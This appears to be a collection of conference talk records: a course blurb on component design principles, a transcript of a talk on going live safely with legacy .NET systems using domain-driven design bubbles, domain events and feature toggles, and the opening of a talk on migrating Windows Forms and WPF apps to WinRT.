Yo, in the back.
|
How do you manage the structure of large agile and object oriented systems? What is the best way to break that structure into components? What should the components contain, and how should they be interrelated? How can we effectively partition a system into independently deployable components? This course teaches the 6 principles of object oriented component design. The first three are principles of component cohesion, which discuss the rules for how classes should be allocated to components. The second three are the principle of component coupling, which discuss how components should be related to one another. Principles include “The Common Closure Principle, the Stable Dependencies Principle, and the Acyclic Dependencies Principle, among others.
|
10.5446/51499 (DOI)
|
All right. So already asked, looks like most people are.NET. This is kind of going live for cowards, really. It's kind of how to sort of not blow yourself up if you have a huge whack of legacy code and how to kind of not get all these calls to kundersterte and not to kind of have to deal with all the really, really ancient kill the code and full of trolls. So who's, yeah, everybody got legacy code, but who's doing most of the work in kind of messy legacy code, kind of the ugly side of coming, coming, coming to a conference like this for sort of relief. Oh, God, this is so beautiful. This is, unfortunately, you've turned up for the ugly part of the conference. This is mostly about messy legacy code and kind of the disgusting things. And let's look at how we can actually get this a little, do this a little safer. Of course, as all of us who work in legacy code know, it's easier said than done. I've often considered trying to make a living actually speaking because it's easy compared to the coding, right? So take it, in fact, we have time for questions and so on and see if we can relate that a bit to your daily experience and actual problems you have. What we're going to talk about, which is going to be techniques for not having to touch your legacy code unless you're wherever possible. It's a tangled mess. Best way to deal with it is if you wouldn't have to deal with it. Is there something you can do? Can you carve out pieces? We're also going to look at ways of when things go wrong. Services go down. Database problems, whatever, server problems. Is there, do you just want to sort of sit there and take it at 3 a.m. in the morning when the support call comes? Or can we do something, sort of a more gradual, more systematic degradation of the user experience perhaps? And we're going to have a brief sidebar into the faster you can turn this around, the quicker you can react to something going wrong. But I'm going to keep that one brief. I had originally planned to do that later, but there's already been lots of other speakers on this conference who talked about automation and continuous integration, all the rest of it. So I'm going to look at that briefly and specifically for what it means for legacy code and stuff you can do. But main thing is going to be about how to structure code and legacy code so you don't have to touch too much of the stuff. Now the taming side effects, we're limiting damage. We're switching the thing off. And of course, I've forgotten all about having these fly-in things in the slide. Awesome. So legacy code, oh, this is from, I'm actually Bavarian, believe it or not. It's been decades I've actually lived there. But this is known as a Volpertinger. A Volpertinger is a southern Bavarian, sort of mythological creature made up of many different parts, part bird, part fish, part badger. And that's kind of what legacy code is like. It's got many different concerns and does many different things. So it's kind of, doesn't make any sense, right? So how can it be divvied up into pieces which make sense? Who here has done, has either read up or books actually doing domain-driven design? Yeah. Dain-driven design, Eric Evans and folks come up with this wonderful concept of a bounded context. I'm going to get into that a little, but it's actually not a technical concept at all. A bounded context is sort of an area of applicability of language, ordinary sort of business language. The things have a particular meaning within that bounded context and it's like, we're going to see examples later, how you can use this bounded context and linguistic business focused language to kind of impose order on your legacy code. You can, how you can sort of identify the bucket into which things need to fall and then you have two choices. You either refactor so you get those buckets or you don't and you cheat and that's what we're mainly going to talk about later. So let's take a look at that. I'm going to, the cheating part means, well, we're going to try to not touch more than we absolutely have to of that legacy code and yet build new functionality on. I did mention it was kind of like a snake oil kind of thing, right? I did mention this is, that's okay, I'm used to that. If you were going to legacy code, you're usually overpromise. Open close principle, Bertrand Meyer brought this up initially. Those of you, most of you probably heard that. It's this ideal on how software should evolve. It's kind of open for extension, closed for modification. Once you write a class or something, ideally all changes are additive. And this is a nice idea in principle on the small scale as well as the big scale. Ideally you could extend all your systems by plugging in and adding on new stuff, right? It would be wonderful. Why is that? Why is that such a good idea? It's because in short it cuts down on side effects and regression test effort. If you only add stuff to it, well, there's a slightly lesser chance that you blow something away that already exists. Of course, legacy usually coupled to the large database in the sky, which means you're going to do it anyway, but that's okay. The second advantage is much from a business perspective is probably more tangible. If you actually haven't changed that lack of code, then no one needs to go away and regression test it. And that means that you can turn around faster because who's got sort of in-house QA departments? Most people, right? Could I have just a question? Who works in a company of, say, more than 100 people? Wow. More than 1,000 people? All right. 10,000 people? Okay. Serious legacy code then. Serious legacy code. Yeah. So you get this thing. So you know all about working with QA. And one classic thing that always happens, which is a great focus and so on, but of course there's a lot of manual testing. All this test automation stuff is marvelous. We're going to look at how to get some of this legacy stuff on the test in a moment. But the reality is with the legacy stuff, it just won't be, right? It just won't be. And so what happens, you make your fix and then comes the part where your code sits somewhere and waits until somebody gets around and actually tests it. And so if you can reduce the amount of stuff which actually changes in existing systems, it by a definition means there's less to test. And so you might get a faster turnaround. You might just be able to get this stuff done faster because you need less QA resources and fast is good for being responsive. So I'm going to look at that. Now strategies for dealing with legacy systems. There is a concept, it comes from Eric Evans and domain-driven design called a bubble strategy. You have a sort of your new system or your new features sitting sort of to the side of the existing system. And the way you achieve that is you write anti-corruption layers or what have you, which keep all the messy stuff apart from the existing stuff. So this can go all the way to the system having its own completely separate database. If your new piece of functionality and it will come to how to actually identify what makes a good piece of new functionality versus a bad piece of functionality as in how to maintain highly coupled or loosely coupled a little later. But if, say, there was a miracle by which you can actually identify such a bubble which is completely internally consistent, the only way into that bubble is through its exposed API. The only way, the only data it ever uses is from its own local database within that bubble. That would be nice because it's the difference between a big mess where everything flows into each other and everything's coupled together and a little mess, preferably one you and your team made all by yourselves and you know, meaning this little bubble, almost like an app or small piece of software on its own with a well-defined API. Now it so happens that that's also the definition of a class really should really have the only way you can do anything in there is through its exposed interface and API. It goes all the way up to a service which is deployed somewhere on a server, I don't know what, a REST service, what have you. In the end, the REST piece is just the transport. It's just the thing which talks to a well-defined API. If you really stick with all design, every class is that completely isolated world with no way in or out, which means for starters it's a lot easier to test, right? You don't have to get all sorts of strange databases in the right state. There will be no side effects which you can't, which outside the bubble, autonomous. And two types of bubbles are an existing database with an anti-corruption layer or a separate database with a so-called synchronizing anti-corruption layer. And I'm not going to talk about the open host service very much. I can look that up in the DDD literature if you want, especially Eric Evans' famous blue book. And an open host service basically just wraps your entire legacy mess into a big API and you hope for the best. We're going to concern ourselves mainly with this autonomous bubble concept with a separate anti-corruption layer. And we're actually going to do that by using events to populate that separate bubble which will have its own database and so forth. This bubble, as you can see, you have the great clouded, all sorts of things in it, legacy system in the sky and say someone wants to make a new sales support system which helps selling, in this case, hotel reservation, get rooms in a hotel booked and get occupancy in a hotel up and reservations and quotes for prices and so on. And this particular API has a quote function, quote for room booking request. And the other part of the API is you can set a room rate, remove a discount rate, add a discount rate. So this is all done here. There is some sort of admin website. I'm sure the guys who work in the really big shops have these. This seems to be a common pattern. You have an admin website through which all sorts of default values, all the rest of it are set. And it's probably an admin website which administers five or six or more or whatever, totally complete unrelated things. And each time you build something new, something else gets clugged into this admin website. I'm hardly there to ask who has got such a beast. This is classic. The admin website for this legacy hotel reservation system happens to have something to set room rates, set discount rates, and add a discount rate. And then this was used for something totally different in the past. And now all of a sudden I want a sales support system. And so you have a choice of either clugging that on top of the existing system or build one of those autonomous bubbles. And for that, in the bubble, all your business rules, all the good stuff, campaigns, frequent guest points, whatever is in there. And it gets fed from the legacy database via this thing. Doesn't matter what you use. There's a classic sort of EDL job. You can use some sort of method calls to post this to some REST API. That's just transport. Or you can make this separate bubble, listen to a stream of events. And this is really messaging. Doing this through messaging and events is the route we're going to go in this session because it's the least coupled way of doing that. It's the least, you pretty much want to publish those events. You can go live very, very safely because you essentially don't have to touch anything in the existing legacy system. If you have identified the right kinds of events, and this, in this case, the sales system, is just one more subscriber to this thing. And you can add as many subscribers as you want, as many systems as you want. And that's, of course, the snake oil part. We're going to look at some caveats and complications for that. Here's a hint. Whenever I've done one of those bubble strategies, oh, I don't know. This kind of, the nice, clean stuff, it should be easy to work with, right? Which is why that was often about half of the overall effort going into this. And the full, the full other half of the effort or more sometimes goes into writing this anti-corruption layer, which is sort of round peg square hole kind of thing, and translating concepts and data structures and what have you into things which are understood by this, by this nice autonomous bubble. So there's a number of, basically the anti-corruption layer here is the, it maps between ugly and clean. And so it's surprising, it's a lot of, it's surprising the labor intensive to do that in my experience compared to the actual bubble, which is sort of breath of fresh air kind of thing. So I'm not going to go into this. This is a detached bubble where you use a repository pattern and the, in this case, sales context doesn't have its own, its own database. That's sort of a, we're going to go beyond that. We're going to work in autonomous bubbles. So how do you pick what's in one of these bubbles? Because clearly it's been done before, right? Anybody who has to write this new piece of functionality, it's not that anybody deliberately sets out to mash that all together with the existing stuff, right? So what's your, what's your guide fence for actually picking what is in your bubble and what's, what's outside? This is where this, this domain-driven design concept of a bounded context comes in. And it's, it's really a business thing. It is the somewhat cryptical, not cryptic, but within a bounded context, the ubiquitous language of the applicable model is used consistently, naming, namespaces and so on. And it has consistent levels of abstraction and so on. What does that mean? Let's have a look. Let's say that we have our, we have two of these contexts. Everybody pretty much has an authentication and authorization context or something like it. And that context is very much one with an established domain language. When you look at logins and authorization and so on, you think about users. You think about registration. There's the concept of logins, logout, forgotten passwords, changing passwords, deleted account, roles. And then there is confirm reservation. Wait, confirm reservation. That doesn't ring right, okay? That doesn't make any sense. Confirming a hotel reservation, kind of, if you put it together, just forget the technology, but just language-wise. Does that fit into authentication and authorization and logins and so on? No. So this is sort of, this part where you do your sort of context map. You kind of figure out what the major sort of problem areas, if you will, or solution areas, the major sort of things within you which you use in consistent language. You figure that out. And it's actually a very, very non-technical activity at this level. It's entirely linguistic. It's entirely pictures in your head. That's how you know that what should go into which bubble. Because if you can manage to build systems, or in our case, because this is going live for cowards, if you can fake your way up to a point out of having to build such systems and coming to that, then you are in a good place. You're in a good place because you won't have such a highly coupled system. And it would be easier to test. Why is that? The ideal architecture diagram, right? We used to do all sorts of UML stuff in the early 2000s, late 90s, and so on. And I found this picture in my head, what the ideal architecture diagram, which actually makes sense, looked like, enterprise architecture. You probably know those sort of enough printouts to fill a wall in some cases. Many boxes, many arrows. What happens to those? They kind of yellow on that wall and no one ever looks at them and they write the code. So that always happened with UML. I never understood why. But I found the sort of image of the ideal architectural diagram. It has something like no more than six boxes and maybe nine arrows. This is for non-technical stakeholders. How to debunk the architecture diagrams you get from your technical folks? Six boxes, nine arrows. Why is that? Because the human mind can't really concentrate and focus on more than six or seven things at the same time. So this point is to make a bigger architecture diagram. Okay. So how can you design a system then? Well, you design it on a human scale where people can actually reason about it properly. The hence that tongue and cheek rule. I thought it was tongue and cheek, but I've actually applied it a couple of times. It's amazing what it does. Anyway. So look at this thing. There's only one arrow between those two books. That was the wrong one. Oh, come on. Awesome. It's only one arrow between these things. By having clean bounded contexts, you reduce the number of things which move between them. Say if, for example, in here, you had confirmed reservation for some bizarre reason here in this context, can you just about imagine what happens when someone does a reserve online over here and some stage they want to confirm the reservation. So they have to call back into this thing here. Of course, that's no longer a pure authentication authorization context. It's now something like the DeWolpertinger thing. It's now a mixture of many things. It's fish, it's foul. It's logins, it's confirming hotel reservations. It's all mixed together. And that means imagine if just that one concept was out of place, you would have another arrow going back there and every arrow is some kind of method, call or something. And before you know it, you get this mess of things which all point at each other and so on. And the starting point for not having that mess is entirely non-technical. It's linguistic. It's meaning. And that makes kind of intuitive sense because, well, if you look at your average iPhone app, it does one thing. It was one thing only it does it well. It's a thing which does authentication authorization well, not likely, but it does hotel reservations, whatever. And so it makes each one of those things could be its own little website which does nothing but that one thing. The fact that it's actually exposed to some API, be it an interface in C sharp, be it REST, be it listening to messages, it actually doesn't matter. These are just transport mechanisms. Think of each one of those bubbles as its own standalone application. Every other world consists of small standalone, isolated, easy to maintain. That's the snake oil part. Anyway, easier to maintain applications. So inside those bubbles, if you drill down one level, you'd have more arrows if you care to draw them. But at the top level, it's at a human scale. It's at a, or moreover, it's at a business level scale. It's at a stakeholder who aren't geeks, who actually absolutely must be in this exercise of establishing those boundary contexts and the context maps. They must be in there for two reasons. First of all, they need to validate this. This is actually not the model of some particular system of yours. It's the model of your business. The other reason why they need to be in that room is because without them in the room, we're all going to geek out. Before you know it, we will talk about JSON, about SQL, about all sorts of acronyms, right? That has no place in that conversation. This is a language and business and a level of abstraction discussion. The purpose is to identify what bucket your code goes in. So beautiful. Oh, by the way, yeah, there's Fowler who talks about those domain events, which you can have bounded contexts, communicate with ordinary method calls and all sorts of things. It's just for this demo, I've chosen the most loosely coupled way of doing it, which is pops up with domain events. So yes, well, if we had all that, we wouldn't actually need to refactor, right? So that sounds wonderful in theory. It is in practice, your code isn't like that, but it's not really about the code. As mentioned before, this is business. One thing I see a lot is when we get into modeling those bounded contexts and so on, we drift into this sort of, oh, but the admin side, it's not like that. And where does the admin side fit into the bounded context? Well, it kind of doesn't in this, it's not in this model. It probably has lots of different concerns. For example, updating discount rate, you have a sort of the reservations domain within that bounded context. And it's imagined your legacy code with those bounded contexts kind of superimposed. So it's a business discussion to identify an ideal world where one bounded context is one system, right? And let's say you've had that discussion. And for that, you absolutely need the business stakeholders in the room because without them. Well, first of all, you learn a lot. Second of all, you don't really want to geek out on this stuff. Then comes the part, which is the truly dark magic, which is how, given that you have all this legacy code, can you actually go and make it behave like that? You have two choices. You can do the great rewrite, the great one year rewrite. Why doesn't that work? Who's tried the great sort of six to 12 months rewrite and refile? Yes, did it work? Yeah. Say, why doesn't it work? Because it's frustrating for the business because at the end of that one year rewrite, they get what they perceive as they already spent the money on it already half. During that year or half year rewrite, people howl for fixes and new features, all the rest of it. And so you get these sort of things living in parallel who never quite meet. And if they meet, it turns into a mess. I forget it. Much better to have those bubbles and give incrementally more features. One way to do that, if you do the great big waterfall thing, but now you go away and you look at your entire business and you identify all of those events which move between those bounded contexts at a business level and identify them all and have another huge diagram on the wall. Remember, you couldn't have more than about six to nine or whatever we said earlier, nine arrows or so. It gets complicated, right? So you do it one at a time. Somebody asks for a new feature. The first thing you do is you assess what domain events are needed in order to fulfill that requirement. You do something like that exercise we saw with the authentication and authorization and the sales, the new sales system context. And you may, you can, this is to assess what information would be needed by a new hypothetical bubble which fulfills this new requirement. The next part is where it gets evil. How do we make the legacy code publish the events? You see, the theory is there is one place in this code where all the information comes together. For example, for entering, I don't know, hotel room discount, hotel room discount rates in the admin system, that admin system, no matter how messy it is, will have one place where all the information pertaining to that comes together and is available and could therefore be pushed out by some sort of event published subscribe mechanism, right? Very often, the most evil place where that happens is very close to the database where the legacy system hopefully at some stage makes up its mind that it has all the information rights to the database. So in extreme cases, I've been known to resort to triggers to actually then fire off some sort of event. So you need to identify those seams to see where you can harvest this particular domain event. Lastly, you want to record this thing somehow because it's nice to be able to replay those later. For example, if you can throw some sort of event store into this, you can fake your, with like, sorry, with emergent design, you can fake yourself all the way into a sort of event store CQRS kind of thing without actually touching much of your legacy code. It would be really, really cool by just adding those event broadcaster things, open close principle, remember? You add those event broadcasting things into your legacy code, which hopefully means you don't have to touch too much of all this junk. And at the same time, you can say you're doing CQRS and event sourcing if you manage to kind of publish events which are good enough to populate aggregate routes, all the rest of it. So you can look very, very cool if you do this right. And that's, of course, really complicated, which is why you do it. One small requirement at the time, if it's smaller, it's less complicated. Finally, one immediate benefit is you can, now that you've got all those domain events coming out, for example, reservations made, reservations canceled, things like that, you can, the immediate benefit is you can actually harvest those. How many of those, how many reservations and cancellations did we have on an average day in July, that kind of thing? Business will love it. Unlike the one year, giant refactoring in the sky, you begin to have feedback and value very, very early before you even build this new feature just by virtue of instrumenting your code. Lastly, you consume the thing who needs to subscribe to the events. And now comes, this is more or less the end of that. And now let's look at, what did I kill the code? Yeah, it's kind of a, for it all, men are called, and I say egg instead of never mind. Okay, sorry. Anyway, let's look at some code. And if you look at, this is the dumbest reservation system in the world, right? It truly is, in this being a demo, the odds are that it won't even work. For example, like that. Wait for it. There you go. It's a very dumb reservation system. For starters, you can just reserve rooms, but it's not for anybody in particular, right? They still do that in Excel on the side. And you can also only reserve for one day. So you can reserve for the 14th, for example, I can make reservations of 10 available rooms. It's also a pretty small hotel. And I can also cancel reservations. And it's been done by hippies, and it's like, it really is legacy. It's absolutely dreadful. So someone says, hey, can you do something? Like we'd really like to know a little more than that. It tells us nothing, right? We would like to see, for example, some information. We need a report and some information which tells us how many cancellations and reservations we had every day. Can you do something? It's kind of like, anyway, I was going to make a joke with Kentucky Fried Chicken. You heard of Kentucky Fried Chicken? Man coming to a veterinarian's office in a panic carrying a bucket of Kentucky Fried Chicken. Doctor, doctor, can you do something? Anyway, this is legacy code. Never mind. Back on topic, let's have a look at this. It's a very dumb system. And you can see here, this is classic ASP.NET MVC. And you can see here that it is a reservation system. And you have a bit of somebody give a first shot at bracketing that into some acceptance tests which may or may not work. There's checking in and checking out and so on. Given 10 rooms available at check-in and so on and so on. But that's about as far as it goes. This is the booking controller, which is really, really messy. You can see here. We have our vacancy and room rates and calculations and all mixed into the controller logic. And here is this reservation function where somebody wishes, if somebody posts, reserves or cancels, it first figures out if it's a reservation or whether it's a cancellation. And here is a really bad sort of thing which you get in legacy code. If this was a proper sort of domain modeling exercise in DDD style, language in here shouldn't increment. Well, that's increment and decrement, right? What are those? Have you ever seen a hotel, somebody working in a hotel? Oh, thank you, sir, for joining us next Saturday to Monday. Let me just decrement the number of available rooms. No, no, no. This brings us right back to consistent domain language. Even the code, and this is really important when it comes to identifying our events and not being led astray by all sorts of technical events like error-raised or stuff like that. Right down into the code, namespaces and everything, the name of the game is to write in in such a way that the hotel manager could sit here, look at the source code, and you could, with a guided tour, this guy would roughly sort of understand what is happening. That's the kind of abstraction. You want to be at the top level as you drill down. Eventually you get into the more technical stuff. But there should be a level of abstraction all the way in your code where business stakeholders can understand that. That's the key for divvying this stuff up and not having everything bleed into each other. So you can see there's not much here. It's really quite, there's some sort of a database which does stuff. Like it's a very dumb database for starters. It's a memory. So if you're looking at a production-ready system and so on, let's look at the next step here, if you recall from this, we looked at this code and we have assessed that what we want is a make reservation and a cancel reservation event. So let's go there and load a version of this, which actually has that. Playing Russian roulette here with live visual studio. So let's look at that same message bus thing after we've instrumented this thing. So you can see here that something new has, two new things have appeared in the solution, a so-called message bus and a pile of unit tests. Let's look at this booking controller, which we took a look at. And the part of the booking controller we were interested in hasn't actually changed at all. Open-close principle, we haven't touched that and yet we want to sort of hose out those events which we can later use. And we've already said that sometimes in legacy, the only place where you can be sure that nobody mucked with it is the final stop when things go into the database because that's where in the end everything has to come together, whether we like it or not. And this was, it's not always the case, right? It depends on what you've got. But that's the assumption I made here. And so let's have a look at what's in this decrement number of rooms available mess. The decrement number of rooms available mess has acquired something called publish event reservation made on a certain date. So it decrements, as we had before, the number of occupied rooms. But now this is additional line, right? Open-close principle. We haven't actually changed this thing, but it now publishes an event here. And if you look at what that actually does, it makes a new reservation, a new reservation made event, and it publishes that on a mythical message bus here. And that message bus is actually injected into the reservation DB, another additive change. So your reservation DB thing, legacy thing, has no code changes. It only has additions to code, right? And assume for the moment that this has the customary 500 to 5,000 lines of legacy code in it. This is a good thing because it keeps your regression test load down. So additive changes. All right, that's marvelous. So this would probably have been several months projects. No, it wasn't. This is actually this message bus piece of infrastructure. What actually is that? Let's have a look. Nothing. It's nothing. It's an interface, right, and it's a stub. They go back to this. Here's your message bus interface, which has one method called publish. We've seen that. And there's a couple of other ones. Like there is something called IEvent, which is just like a marker. And then it has a stub where it does nothing, right? So how do we wire it up? Who cares? We just do poor man's dependency injection. We make a new reservation DB, which is starting anywhere in O'Rubbish, and we wire it up with a stub which does nothing. So what's the point of that? Where's the value in that? Test coverage. The value is in suddenly having unit tests around this which weren't there before. We're talking about value early. We're now talking about, for example, we don't make this reservation if a hotel is fully booked, right? These were tests. This was in the legacy code, so it should not do that. When this thing is fully booked, you shouldn't be able to make a new reservation, but there were no tests around it. Safe refactoring. You need tests. And by instrumenting this thing with events, it's like a sort of a dipstick where you can sort of get a bit of coverage. Because you've identified those seams at which all the information is there to make a reservation just before it's written to the database or wherever, if you had just this one thing in there which sort of sends that message, then you can write a test saying whether that message has actually been sent. And in this case, the way we do this is we use a, what's it called? We just use a mock, a fake service bus. This is my, who's using RhinoMocks or something similar? Yeah. This is one called fake it easier. I find it easier to read. What are you using fake it easy? I kind of like it. It does the job and it's kind of, it's a matter of taste, right? It doesn't matter. We fake the message bus and we do the booking for this and then we verify that a call to the message bus publish method with an event of the type reservation made must have happened at some point in time, right? So you test the early benefit test coverage, right? So that's that intermediate refactoring step. So good. Now we have a little more confidence, additive changes, some test coverage and a fake stop dot message bus. Let's do the next step. Remember the requirement was, well, we really want this extra, this other system which allows us to get some statistics out of this thing. And for that, we want to have those events canceled and reserve published. And so now we have new systems. We have this message bus slash events publisher, but it has acquired a major dependency and in this case, a RabbitMQ, which is fine. So we implemented our message bus so we can publish events on RabbitMQ. Anybody using Rabbit here? Okay. So there's that. We also have something, a new thing called statistics. I'm coming to the, the online, send online confirmation thing in a moment, but here's the statistics thing and it does two things. Again, right at the top level, you should, this is new code. You should be able to see what it does. Reservation, it deals in reservations and cancellations per day and it updates the reservation statistics. So it sits here waiting for, waiting for events to come in and let's see what it does. Now that all depends on whether I actually started zero MQ. This is actually the wrong, a little ahead of time. This is actually the wrong, the wrong demo. You've got a guest phone number here. I'm coming to that. As you can see here, let's leave this one aside. If I submit this stuff, you can see that on the 14th, you have five reservations and zero cancellations. If I make it the 15th and I make a reservation, suddenly that appears and if I make cancellations, the stats are updated. So this is a completely separate system to which we publish events via RabbitMQ and it basically uses that instrumentation you've done, you've seen earlier in the earlier example. There were no further changes to the legacy system at all, none whatsoever. The only thing, well, except that we now instead of the stub wired up the actual RabbitMQ publisher. Apart from that, there are no further changes. Again, minimum touch points and minimum coupling and simpler maintainability. So next, well, all right, so this is kind of wonderful, but now we really want to have something where we can send these people an SMS message. Okay, you've done a booking. This is part of an online booking kind of self-help context. I really would like to get some sort of booking confirmation. Again, we can either crack open the legacy code or we can make another one of those bubbles, which is a sort of a guest notification kind of context. Again, there were no, so what do we need for that? Let's take a look at the finished product. You can sort it here. If I put in a fictitious phone number, then you can see that there is still the statistics update up here, but there's also a second quote unquote service, which is because of console app, which sees that room bookings, if I booked three, which sends SMS to these people if they booked rooms. There's none which notifies them of cancellations yet, but it certainly does. It certainly makes those reservations and sends those SMSes. So how did we do that? Well, there's a slight complication here compared to the previous one. The previous, let's look at the events in this. For that, a shared messages project has appeared. Shared messages has a reservation canceled event, and the only thing it has is a reservation date. We had that earlier. That was the earlier system, which had no concept of all at all about individuals. It just knew that one is stupid, but it only knew about one reservation having been canceled on that day. And you had a reservation made, which also only knew about a reservation date. But we have had a change, right? We suddenly needed an additional field, the guest phone number, because this guy is supposed to get SMS messages. Oh, somebody reserves. We've captured that phone number, but how do we get that in here? How do we make sure that this confirmation system, this bubble, can actually receive that phone number? And remember, we got these domain events, reservation made and reservation canceled, which somehow have to go there. And so we have two choices. We can either whack this thing in here and just change the already existing reservation made event, the reservation event, which would violate the open-close thing. We don't want to change it once it exists, because what happens if we change this one? We might break the original calculate statistics of number of reservations, cancellations by day service, right? We would have to touch that. We might break something. We really don't want that. We want that service to keep running safely deployed somewhere, and so we don't have to go live and do another deployment. Remember deploying things safely for cowards. So what we do is we make a version two. The next version of reservation made has both guest phone number and the reservation date, right? And so if you look at the code for the, if in the actual online confirmation part, you can see that, if you go in here, it checks for the routing key, not to get into Rabbit MQ too much. And it basically checks, it only accepts this type of domain event. It only accepts reservations, reservation made version one, because that's version one is the only thing which has what it needs, which is that phone number to send the SMS to. Conversely, if you look at the same thing in the statistics thing, the one we had earlier, the updates, the updates stats thing, once I drill down to that level, it deals in the original reservation made and reservations canceled. So it's able, if you look into the record thing, it's able to deal in the original event type. So I don't have to touch it. And it keeps running. So you have these immutable message versions which live in this shared thing, and gradually you add more and more, and then you can have a sort of, as you retire old legacy services if you ever do, some of those messages won't be needed anymore and don't need to be routed anymore, but in the meantime it's all additive. Again makes it much, much safer to go live, right? Pops up, you send those events, listeners are there, they update the databases, independent, small bubbles. Okay. So now we have, where are we at? We have a system which, in our, where we've sort of identified those cancellation and reservation events, where we publish all these, and we've sort of done the entire, we've done the entire cycle, and we've gone live in two iterations already, one, small iterations. One for getting the original statistics calculated, and then another one for getting those SMS messages. Both were entirely additive, going live for cowards, less QA effort, less, after the, the only hairy part in this is where we have to, to, to harvest, sort of, make that legacy code, publish the events, but that, that gets less sketchy every time because you understand better where you can hook into this thing, and it's, it's still the lesser of two evils. And so additive changes, you gradually build on those little bubbles. So last, what happens if it goes wrong anyway? What happens if, for example, oh my God, the brand, brand new RabbitMQ server is down, nothing works anymore? That's where the sort of final concept I wanted to sort of throw in the pile for going live safely today comes down, is, it comes in. This is the concept of a, like a domain feature toggle. Who, this isn't the same thing as the versioning and source control concept of a toggle. Who here is using feature toggles? Yeah. You are using it sort of, so you don't need to branch or something like that? So, yeah, probably. This is a slightly different idea, which we actually chanced in our shop in sheer desperation. You have all these nice services, which are, some of these, it's less of a problem than the ones which are fed by domain events. But if you have a SOA thing, but some of your services, which you need for your read models, this applies particularly to read models, of course. If you need to, in order for the, for the user to see, for example, what bookings exist, at some stage, well, you often need to make a query, right? So some REST thing or SOBA, who knows what. And now you have all these separate services. Unfortunately, the damn box goes down. The service is dead. One great big clattering error message appears on the user's screen. This is reality of the legacy stuff. And once you pull it apart, you have more moving pieces, which can go wrong. And that exactly happened to us. This was a new service, a bubble context. In this case, for a toll processing system for a bridge. And, oh, man, it runs on something which sits on top of the Amazon, the Amazon EC, whatever, cloud. What's the chances of that ever going down? And last year, it goes down. And we have an entire, because this was sort of the analog of this sort of admin side thing, which does lots of different things. Basically, our little service, the tolling service in the back going down, took out the entire website in the front, which needed to talk to it. And if it didn't, it blows up. So what do you do? This is how we went into this domain feature toggles thing. And what it does, it's very, very dumb. It's in a nutshell. On a per feature basis, you can switch it off, right? Promotions enabled, online bookings, where you have this, for example, the sort of product for which this enter your phone number is, and it's about the context sense in the system, is online bookings. If I set that to false and switch this thing off, as you can see here, all of a sudden, it looks like the old system. I can make my reservations and all the rest of it. In spite of the, we assumed here that something in the back, which is needed for that new feature, which is making bookings by phone number, is no longer available. And therefore, we switch it off. You can just about imagine the messy if statements in the back which do that. The key difference to a feature toggle is that it's actually a product thing. You can actually use that to monetize a software as a service thing. That's kind of, in my mind, the right way to think about it. You have this guy who, your product owner says, yeah, this user should be able to get those confirmations. Therefore, you need to enter the phone number. This guy should do this and this and this. So it's definitely not a source control thing. It's a switch. And it's a product level, domain feature level kind of switch. All right. What have we got in, how does this all then come together with, what it comes together as is a gradual degrading of the user experience, a managed, oh, God, the entire site fell over. No, it doesn't. Because you have those reasonably clear bounded contexts which deal with specific products and functionality they implement, you can say, okay, that's that service, which is one bounded context and has a couple of things in it, is down, that is down, that is down. These different services are needed to provide the following user level functionality and affect the user interface in this following way. Therefore, let somehow engineer our user interfaces so the feature set sort of gradually gets restricted as the underlying services go bang. So it goes like this, service goes down, then automatically or manually, what you've seen in config files, of course, the chain saw thing, it's 3 AM, you whip into production and edit config files. That's the crudest way. You can also do some sort of monitoring when the services go down. Something knows what needs those services and therefore knows what features are switched off and could automate that. It screams loudly by sending alerts. Then after services restored, the features switched on. So this is how you get yourself a nice safe fallback with a controlled way of restricting the user experience. Hard to do in practice, but we found it worthwhile. It saved us from a couple of other things. It also means that you can do selectively make features go live for subgroups of users offer products, much more flexible, much simpler. With that, seeing as we are out of time, summary, find legacy code seams, identify those bubbles using bounded contexts and so on. Find a way to get data into these bubbles. The one we looked at was publishing those domain events. Find a way of safely degrading user experience if the whole Apple cart gets upset and falls over. Automate everything so you can do this turning around fast and small pieces to production regularly. And finally, eliminate waste in your processes. This is a big part of that because it reduces regression tests and that wait time which happens until they're all done. That's about it for today's snake oil. Thank you very much. Any questions? I'm here for another 10 minutes or so.
|
Production. It's where legacy code grinds into shiny new SOA, CQRS and event sourcing goodness. It's where new ideas must go. It's where failure is not an option and the stakes are high. Breaking it can seriously ruin the "Agile" thing you've been trying. It's all or nothing. On the other hand - maybe you could cheat. The talk presents a step-by-step approach for not getting caught with the proverbial pants down when rolling out new systems in legacy-heavy, dependency infested fragile environments. The emphasis is on practical examples for achieving the necessary separation of concerns, deployment automation and monitoring in small increments as part of day-to-day development work, in what constitutes reality for most dev teams: Not enough time for a large concerted effort to clean up code, automate and put tooling in place. Legacy code divide & conquer: Using Domain-Driven-Design techniques to delineate areas of responsibility and create "bubbles" of side-effect free functionality which can be deployed safely. "It's broken! Quick, switch it off...!" How to use business domain level feature toggles to deploy new functionality safely and gracefully degrade end user experience when services fail. Automated deploy, chainsaw edition: An example for getting from manual deploys to pushbutton automation in small (relatively) simple steps. Watch it like a hawk: How to move towards log aggregation, monitoring and alerting that radiates troubleshooting information and business metrics. Combined with domain toggles this can lead to a system that: 1. Detects malfunctions, 2. Switches off affected functionality in a controlled manner, 3. Alerts operators.
|
10.5446/51500 (DOI)
|
Is the speaker on? You can hear me? Wonderful. So then I think I shall begin. Welcome everyone. Thank you for coming to this talk. My name is Rocky Latka and I am the CTO at a consulting company in the United States called Majenek and it's my pleasure to come here and speak to you. I enjoy coming to Norway. I think this is the fourth time that I have been here and it's such a beautiful country. This time I was fortunate also enough to be able to bring my family so they're able to see the beautiful country as well. So thank you for allowing me to be here and to speak. My topic today is how to migrate from Windows forms and also WPF or VPF and Silverlight to WinRT. And so a lot of this talk is going to be about strategy and approach and less about code. And the reason for this is that a lot depends on where you're coming from. What is your start point in terms of what kind of coding techniques and technologies you're using in Windows forms, whether you do or don't already know XAML with WPF or Silverlight and whether you're using N tier, two tier client server or service oriented or N tier architectures. And so all of these are important considerations. And so instead of trying to show maybe one particular approach or two different approaches, I'm going to talk a lot about the concerns. And I will show a little bit of code just to reinforce how some good planning will help. But a lot of this comes down to good planning and thinking ahead. Now if I can convince, there we go, PowerPoint to move forward. So before we get into too much strategy, and it's hard to see at the lights, but how many of you are already developing with Windows 8 and the Windows runtime? I think that would be three. And that's good. It's better than none. How many of you are primarily using Windows forms for all of your application development now? How many of you are using WPF? Silverlight? So the one person who says that he uses Silverlight, congratulations, you are in the best possible position to move to the Windows runtime. Good choice. Now I realize that everyone says that Silverlight is dead. You should avoid Silverlight because it's a dead end technology. And I will actually argue that so is WPF, right? Or VPF. VPF is dead. So Windows forms is dead. Are you shocked? Anyone shocked? No? Amused? So 